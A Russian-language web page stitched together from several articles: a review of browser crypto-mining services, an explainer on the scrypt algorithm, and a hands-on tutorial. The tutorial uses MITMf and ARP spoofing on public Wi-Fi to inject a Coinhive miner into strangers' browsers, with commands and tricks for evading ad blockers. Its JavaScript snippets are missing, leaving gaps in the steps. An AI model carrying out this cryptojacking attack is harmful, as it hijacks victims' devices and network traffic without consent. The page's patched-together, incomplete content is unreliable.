Майнер скрипт как сделать

Обновлено: 07.07.2024

Сегодня я хочу рассказать Вам о наиболее известных сервисах для майнинга в браузере на посетителях Ваших ресурсов.

1. Coinhive — вкратце — это крипто майнер на JavaScript для вашего ресурса, который копает XMR (Монеро) напрямую из браузера.

Mining dlya vebmasterov


По факту сервис позволяет монетизировать любой сайт с трафиком за счет работы процессоров посетителей. Вы регистрируетесь на сервисе, настраиваете ваш профиль, прописываете XMR кошелек для выплат и устанавливаете соответствующий JS код на сайт. Пока посетители находится на вашем сайте его процессор майнит Вам монеро. Это самый простой вариант. Помимо этого для разработчиков предлагается API, с помощью которого можно реализовать более гибкие сценарии использования сервиса, на Ваш выбор.

Разработчики сервиса уже реализовали подобные варианты монетизации и добавили на сайт поддержку:

  • Proof of Work Captcha
  • Proof of Work Shortlinks

В первом случае при совершении определенных операций на сайте всплывает следующая капча:

После “Verify Me” браузер откопает немного монеро, а вы получаете не только немного валюты в виде доказательства работы посетителя (Proof of Work), но и подтверждение того что он не является ботом. На мой взгляд просто отличная альтернатива обычной рекапчи.

Подобным образом действует функционал “Proof of Work Shortlinks”. Он представляет собой сервис сокращения ссылок с аналогичным капче профитом.

coinhive maining

В настоящий момент минимальная выплата из данного сервиса, составляет 0,05 монеро. Вы можете выводить и меньшую сумму, но тогда сайт возьмет комиссию 0,01 монеты.

2. JSEcoin — второй сервис для любителей помайнить через браузер.

jsecoin maining


Майнить можно как в своем браузере, так и разместив JavaScript на своих порталах.
Например за 1 час в браузере накопилось 0.06 монеты, за ночь — почти половина.

3. Crypto-loot — полностью аналогичный первому сервис.

crypto loot

Отличается только меньшим порогом выплат и меньшей комиссией на вывод средств. Минималка 0,03 монеро. Отзывов о данном сайте практически нет, так что можете пользоваться на свой страх и риск. Активную ссылку на него оставлять я не буду. Могу с уверенностью сказать о работе первых двух сервисов.

Добыча криптовалют становится все популярнее. Огромное количество людей ищет способы майнинга и надеется использовать как можно более простой, но прибыльный способ. По ходу формирования запроса со стороны сообщества, появилась возможность так называемого браузерного майнинга – получения монет через веб-сайты в интернете.

Браузерный майнинг: что о нем нужно знать, мнение экспертов.

В этой статье мы расскажем о таких важных аспектах вопроса, как:

  • техническая реализация;
  • доходность;
  • достоинства и недостатки метода;
  • вывод заработка.

Что такое браузерный майнинг и как он работает

Вопросом о том, что такое браузерный майнинг и как он работает, ежедневно интересуются тысячи новичков криптовалютной сферы. По сути, это дополнительный вариант получения цифровых денег, который настраивается при помощи специального ПО, вшитого в веб-сайт. Это программное обеспечение задействует ресурсы компьютера посетителя, с целью добычи той или иной монеты (используются мощности процессора ПК).

Что такое браузерный майнинг и как он работает

Такой подвид заработка на ничего не подозревающих пользователях иногда рассматривают, как уникальный вид монетизации работы ресурса. Браузерную добычу применяют, как альтернативу засилью рекламы. Некоторые площадки даже сообщают о возможности и предлагают выбор между данной технологией и включением рекламных блоков для каждого конкретного пользователя.

Браузерный майнинг на своем ПК

Браузерный майнинг на своем ПК возможен исключительно при помощи регистрации на специализированных площадках. После авторизации и посещения страниц такого сайта, у пользователя ПК начнет накапливаться специализированная валюта, путем использования мощностей его устройства и интернета.

Вывод, зачастую, будет доступен уже через несколько недель после начала работы.

Браузерный майнинг на своем ПК

Скрипт добычи криптовалют

Скрипт добычи криптовалют – специальный код, который раньше добавлялся исключительно в ПО для добывания цифровых денег. Сейчас для некоторых из монет существует возможность добавления скрипта прямо в код веб-страницы, которую посещают пользователи сайта. Он будет провоцировать значительное использование мощностей процессора устройства с целью их применения в получении блокчейн-денег.

Плюсы и минусы извлечения крипты в браузере

Изучив вопрос, можно легко найти плюсы и минусы извлечения крипты в браузере. Тем не менее первых, все-таки, больше.

К достоинствам можно отнести:

  • простоту ознакомления и использования метода;
  • доступность специализированных ресурсов для добычи;
  • отсутствие необходимости в сложных технических устройствах (ферма майнинга);
  • получения криптовалюты на сайте – идеальный первый шаг на пути ознакомления со сферой;
  • этот вариант криптовалютного заработка со временем может победить засилье рекламы в интернете.

К недостаткам относятся:

  • самый низкий доход;
  • использование метода мошенниками с целью анонимного майнинга при помощи устройств посетителей сайтов.

Плюсы и минусы извлечения крипты в браузере

Сколько можно заработать

Вынуждены разочаровать всех, кто хочет понять, сколько можно заработать на данном методе. К сожалению, в частном порядке, используя самые лучшие сайты и достаточно мощный ПК, заработать много не получится. Эксперты подтверждают это утверждение и советуют не надеяться на сумму, превышающую стоимость оплаты за интернет.

Как выводить заработок

Площадки для специализированного веб-майнинга позаботились о том, чтобы у пользователей не было лишних вопросов о том, как выводить заработок. Популярные ресурсы предлагают отправку средств на самые известные платежные системы или на банковские карты.

Стоит отметить, что получить непосредственно криптовалюту не получится. Мощности пользователей идут на получение цифровых денег, но сами они накапливают внутрисистемный актив, который в дальнейшем переводится в классические деньги и выводится на фиатные цифровые кошельки/карты.

Как выводить заработок

Тем не менее у них всегда есть возможность посетить один из популярных онлайн-обменников, на сайтах которых можно быстро и анонимно купить цифровые деньги за фиат. Стоит отметить, что на таких ресурсах всегда есть неплохие бонусные программы и системы реферального заработка, повышающие профит для отдельного клиента в разы.

Скрытый браузерный майнинг – как защититься?

Скрытый браузерный майнинг – как защититься?

В связке с другими браузерами рекомендуется использовать браузерные разрешения AdBlock и Ublock. Вместе со своей основной функцией (блокировка рекламы), они отлично справятся и с защитой от несанкционированной добычи Monero или других криптовалют через браузер.

Отзывы майнеров

Отзывы майнеров-профессионалов свидетельствуют о том, что добыча через браузер не сможет стать полноценной альтернативой использованию специализированного ПО. Сейчас и в ближайшем будущем он будет неплохим инструментом для ознакомления с процессом майнинга для одиночек, а также более-менее привлекательным заработком для администрации популярных сайтов.

Scrypt - скрипт - алгоритм для майнинга криптовалюты

Scrypt (Скрипт) – это метод криптошифрования, который использует большой объем памяти и требует много времени для подбора. Алгоритм Scrypt применяется при майнинге криптовалют, что позволяет делать его более сложным для специализированных ASIC-майнеров.

Scrypt монеты отличаются от биткоина тем, что последний использует алгоритм SHA-256. В отличие от скрипт криптовалют биткоин и другие валюты на этом алгоритме легко майнятся на ASIC (устройствах, которые специально разрабатываются только для решения задач майнинга). Это часто вызывает негативную реакцию у создателей скрипт криптовалют, так как дает преимущество майнерам с большими ресурсами и нарушает децентрализацию.

Не использующий скрипт биткоин только один пример. Поэтому scrypt монеты пользуются популярностью среди майнеров, который используют для майнинга процессоры (CPU) или видеокарты (GPU). Рассмотрим scrypt алгоритм, его особенности и преимущества.

Содержание

Scrypt (Скрипт) — адаптивная криптографическая функция формирования ключа на основе пароля, созданная офицером безопасности FreeBSD Colin Percival для системы хранения резервных копий Tarsnap. Функция создана таким образом, чтобы усложнить атаку перебором при помощи ПЛИС. Для ее вычисления требуется значительный объем оперативной памяти. 17 сентября 2012 года алгоритм scrypt был опубликован IETF в виде Internet Draft, планируется его внесение в RFC. Используется, например, в качестве proof-of-work в криптовалютах Litecoin, Worldcoin и подобных.

Основанные на пароле функции формирования ключа (password-based key derivation function, PBKDF) обычно разрабатываются таким образом, чтобы требовать относительно большого времени вычисления (по порядку величины — сотни миллисекунд). При использовании легальным пользователем требуется вычислить подобную функцию один раз (например при аутентификации) и такое время допустимо. Но при проведении атаки полного перебора (brute force) атакующему требуется произвести миллиарды вычислений функции и ее вычислительная сложность делает атаку более медленной и дорогой.

Если скрипт проверяет ключ пользователя, то такое замедление будет практически незаметным. Но когда код пытается взломать злоумышленник методом перебора, скрипт это усложняет: в сумме все операции занимают очень много времени.

Для любой Scrypt монеты это означает, что ее майнинг потребует большого количества участников в сети, каждый из которых будет выполнять часть работы.

При выборе криптовалюты, использующей scrypt алгоритм, на чем майнить тоже немаловажно.

Когда новичок начинает изучать алгоритм Scrypt, чем майнить становится главным вопросом. Основным параметром при выборе становится scrypt хэшрейт, то есть требуемая от оборудования производительность, которая позволит майнить криптовалюту.

Чтобы вычислить scrypt hash, то есть найти то самое решение, которое позволит создать новый блок в блокчейне, опытные майнеры советуют использовать GPU. Видеокарты более производительны, чем процессоры, к тому же лучше справляются с выполнением одной операции. Лучше всего подойдут Scrypt miner AMD: эти видеокарты обладают большей производительностью, чем Nvidia, и собрать ферму из них дешевле. Также Scrypt mining требует больших объемов памяти.

Но для старта одиночного майнинга на Scrypt требуются достаточно большие ресурсы. Альтернативный вариант - script пулы. Это сообщества, в которых вы предоставляете мощность своего оборудования для объединения усилий. Такой подход дает лучший результат, чем сольный майнинг, однако вознаграждение получается ниже.

Чтобы найти лучшие пулы для майнинга scrypt криптовалют, надо обратить внимание на их направленность. Существуют пулы, заточенные только под одну монету, а есть мультивалютные, в которых можно переключаться с одной криптовалюты на другую. С точки зрения стабильности дохода лучшие пулы Scrypt монет относятся к первой категории.

scrypt (P, S, N, r, p, dkLen) = MFcryptHMAC SHA256,SMixr (P, S, N, p, dkLen)

    • где N, r, p — параметры, задающие сложность вычисления функции.

    MFcrypt определена так: DK = MFcrypt PRF,MF (P, S, N, p, dkLen)

      • PRF — псевдослучайная функция (в scrypt — HMAC-SHA256)
      • hLen — длина выхода PRF в байтах
      • MF (Mixing Function) — последовательная функция, требующая память со случайным доступом (отображение из Z_^ * N в Z_^ (в scrypt — SMix на базе Salsa20/8)
      • MFLen — длина блока, перемешиваемого в MF (в байтах). MFLen =128 * r.
      • P — пароль (passphrase) — байтовая строка.
      • S — соль (salt) — байтовая строка.
      • N — параметр, задающий сложность (количество итераций для MF).
      • r — параметр, задающий размер блока.
      • p — степень параллельности, целое число, меньшее чем (232 − 1)*hLen/MFLen
      • dkLen — требуемая длина выходного ключа в байтах, не более чем (232 − 1)*hLen.
      • DK — выходной ключ

      Функция MFcrypt работает по алгоритму:

      • (B0 … Bp−1) = PBKDF2 PRF (P, S, 1, p * MFLen)
      • Для всех i от 0 до p−1 применить функцию MF:
      • Bi = MF(Bi, N)
      • DK = PBKDF2 PRF (P, B0 || B1 || … || Bp−1,1, dkLen)

      Потребление памяти оценивается в 128*r*N байт. Соотношение количества чтений и записей в эту память оценивается в 100% и 63%.

      Где Integerify – это биективная функция из промежутка от k до .

      Главный вопрос после того, как вы поняли, что такое алгоритм Scrypt — что майнить на нем. Первая использующая алгоритм scrypt криптовалюта — это Litecoin. Также на нем работают все форки лайткоина. Например, чуть меньше популярность на алгоритме scrypt монеты Dogecoin.

      Среди других криптовалют, использующих алгоритм scrypt — монеты ProsperCoin, CashCoin, MonaCoin, Mooncoin и многие другие. Криптовалюта Litecoin использует такие параметры Scrypt: N = 1024, r = 1, p = 1, размер входного параметра и соли - 80 байт, размер DK - 256 бит (32 байта). Потребление оперативной памяти для Scrypt майнинга монет- около 128 КБ. Вычисление такого Scrypt на видеокартах приблизительно в 10 раз быстрее чем на процессорах общего назначения, что является признаком выбора недостаточно сильных параметров.

      Рекомендуемые параметры scrypt: N = 16384, r = 8, p = 1 (потребление памяти около 16 МБ) Скорость вычисления одной операции Scrypt на процессоре общего назначения составляет около 100 миллисекунд при настройке на использование 32 МБ памяти. При настройке на длительность операции в 1 миллисекунду, используется слишком мало памяти и алгоритм становится слабее алгоритма bcrypt, настроенного на сравнимую скорость.

      image

      Как работает Coinhive

      В Coinhive реализованы легитимные методы майнинга криптовалют, которые администраторы и операторы могут внедрить в свой вебсайты. При посещении сайтов, на которых размещен Coinhive, JavaScript запускает майнинг криптовалют в браузере в фоновом режиме с использованием процессоров компьютеров пользователей.

      Этот инструмент был создан в качестве альтернативы заработку при помощи некрасивых баннеров, которые занимают часть страниц сайта и могут быть легко удалены блокировщиками рекламы. Coinhive предназначен для майнинга криптовалюты Monero (XMR), которая, на момент написания статьи, была в 35 раз дешевле биткоина, однако находится в ТОП 10 наиболее ценных криптовалют, формируемого на базе цены за одну монету.

      Coinhive – вполне легитимный инструмент, однако недавние события показали, как легко хакеры могут злоупотреблять технологиями майнинга на базе JavaScript.

      Случай с BlackBerry – один из многих инцидентов, когда хакеры и интернет провайдеры используют Coinhive во вредоносных целях. В октябре специалисты компании TrendMicro обнаружили несколько приложений в Google Play Store, использующих технологию Coinhive для незаметного майнинга криптовалют после установки Android-приложения. Кроме того, сообщалось о майнерах Coinhive, которые интернет провайдер внедрил на сайте Starbucks.

      Методы эксплуатации Coinhive

      В нашем примере мы будем использовать MITMf для инжектирования майнера Coinhive в браузеры, находящиеся с нами в одной Wi-Fi сети. Мы будем внедрять JavaScript-майнеры в веб-страницы в тот момент, когда посетители кофейни пользуются интернетом.

      Вначале следует упомянуть, что сервис Coinhive блокирует аккаунты в случае, если JavaScript-майнер используется в неправомерных целях. Рекомендую пользоваться этим руководством только в образовательных целях, и не заниматься внедрением в хотспотах, которыми вы не владеете.

      Шаг 1: Установка MITMf

      Я буду устанавливаться MITMf в Kali Linux при помощи утилиты apt-get. В терминале введите команду, показанную ниже. Если вы предпочитаете сборку из исходных текстов, можете воспользоваться этим руководством или инструкциями по установке.

      sudo apt-get install mitmf

      После установки никаких дополнительных настроек не требуется, и мы переходим к созданию учетной записи на сайте Coinhive.

      Шаг 2: Создание учетной записи

      После установки MitMF переходим на страницу регистрации для создания аккаунта. Какие-то особые требования для создания учетной записи в сервисе Coinhive отсутствуют, и каждый может зарегистрироваться в течение нескольких секунд.

      Затем нужно проверить электронную почту, кликнуть по присланной ссылке для завершения процесса регистрации и залогиниться в новом аккаунте. Нам понадобится индивидуальный ключ, который размещается на сайте, где предполагается использование JavaScript-майнера. Хотя мы будем использовать Coinhive нетрадиционным способом, и нам понадобится только ключ.



      Рисунок 1: Список ключей

      Шаг 3: Обход блокировщиков рекламы

      Вначале зайдем в раздел с документацией, чтобы ознакомиться со скриптом, который будет инжектироваться в браузеры жертв. Ниже показан JavaScript-майнер в самой наипростейшей форме.

      Следует отметить, что шаги 4 и 5 не являются панацеей и не смогут защитить вас от всех блокировщиков вследствие того, что майнер должен отправлять результаты своей на сервер (а иначе майнинг не имеет смысла). Поскольку в исходном коде жестко прописан адрес сервера, против блокировщиков, фильтрующих на уровне DNS, наш метод не сработает. Возможен лишь обход приложений, блокирующих HTML-тэги.

      Шаг 4: Переименование JavaScript-файла

      Вначале создадим временную директорию, где будет храниться файл майнера. При помощи команды mkdir создайте папку coinhive-js в директории /tmp. Затем, используя команду cd, перейдите в новую директорию.

      mkdir /tmp/coinhive-js
      cd /tmp/coinhive-js

      Далее загрузите файл coinhive.min.js, который мы будем инжектировать в браузеры жертв. В Unix-подобных системах в терминале можно ввести следующую команду:

      В качестве нового имени зададим строку из случайных символов, которая навряд ли окажется в базе данных блокировщика. Для генерации случайной строки введите в терминале следующую команду:

      openssl rand -hex 16

      mv coinhive.min.js random-string-here.js

      В демонстрационном примере я вводил случайные символы с клавиатуры.



      Рисунок 2: Переименование и загрузка JavaScript-файла

      Наконец, нам нужно сделать так, чтобы файл был доступен для загрузки у жертвы, находящейся с нами в одной Wi-Fi сети. Для решения этой задачи воспользуемся простой командой:

      Шаг 5: Обфускация URL

      Самый простой способ - воспользоваться online-утилитами для преобразования IP-адресов в шестнадцатеричные строки. Вначале, определите IP-адрес при помощи команды ifconfig:

      Ваш локальный IP-адрес скорее всего будет выглядеть как-то так 192.168.0.2 или так 192.168.1.10. Затем введите полученный IP-адрес в конвертере для вычисления шестнадцатеричного эквивалента.

      Теперь собираем готовый скрипт. Ниже показана новая версия с шестнадцатеричным IP-адресом и измененным именем файла.

      Сохраним этот код в отдельном локальном файле, который далее мы будем инжектировать в браузеры жертв при помощи MITMf. Для сохранения JavaScript-кода вы можете либо воспользоваться любимым текстовым редактором, либо следующей командой:

      Код, показанный выше, мы будем сохранять в директории coinhive-js в файле miner.js. Нажмите Ctrl + X для выхода из nano, введите Y и нажмите Enter для сохранения файла.



      Рисунок 4: Содержимое файла miner.js

      Шаг 6: Инжектирование майнера в браузеры

      mitmf -i wlan0 --inject --js-file /tmp/coinhive-js/miner.js --arp --spoof --gateway 192.168.0.1



      Рисунок 5: Запуск MitMf



      Рисунок 6: Появление события, связанного с инжектированием JavaScript-файла (выделено красным)

      Если посмотреть содержимое страницы, просматриваемой жертвой, то можно увидеть, что полезная нагрузка была инжектирована в нижнюю часть и без ведома жертвы.



      Рисунок 7: Содержимое страницы с внедренной полезной нагрузкой

      Ни один из трех наиболее популярных блокировщика рекламы, установленных мной из Chrome Web Store, не смог обнаружить вредоносную активность.

      После инжектирования майнера в браузер жертвы, можно остановить атаку и отключить MITMf. Майнинг будет продолжаться. Если жертва уйдет из кофейни с открытой вкладкой, майнинг возобновится при следующем подключении к любой Wi-Fi сети. Майнер Coinhive будет работать до тех пор, пока жертва не закроет инфицированную вкладку или браузер.

      Как защититься от JavaScript-майнеров

      Как вы могли убедиться, блокировщики рекламы не являются столь эффективным при противодействии JavaScript-майнерам. Немного смекалки и майнер оказывается внедренным в веб-страницы, которые вы просматриваете в браузере.

      Насколько прибылен JavaScript-майнинг?

      Всех, кто интересуется вопросами прибыльности майнера Coinhive, отсылают к статье Максенса Корнета, где подробно рассматривается этот вопрос. Максенс на несколько дней подключал Coinhive на своем сайте с ежедневной посещаемостью в 1000 человек и получил следующие результаты: за 60 часов было заработано 0.00947 XMR или 0.89$ (получается 0.36$ в день).

      Прямо скажем, результаты не очень впечатляющие, однако, вне всякого сомнения, майнинг при помощи Coinhive становится все более полярным особенно среди тех, кто пытается найти новые способы незаконного обогащения. Возможно, на не очень посещаемых сайтах доходы будут небольшими, однако представьте, что будет, если разметить майнер в Facebook или Google. И подобное вполне может случиться.

      Вопросы и комментарии как всегда приветствуются.

      В нашем телеграм канале мы рассказываем о главных новостях из мира IT, актуальных угрозах и событиях, которые оказывают влияние на обороноспособность стран, бизнес глобальных корпораций и безопасность пользователей по всему миру. Узнай первым как выжить в цифровом кошмаре!

      Читайте также: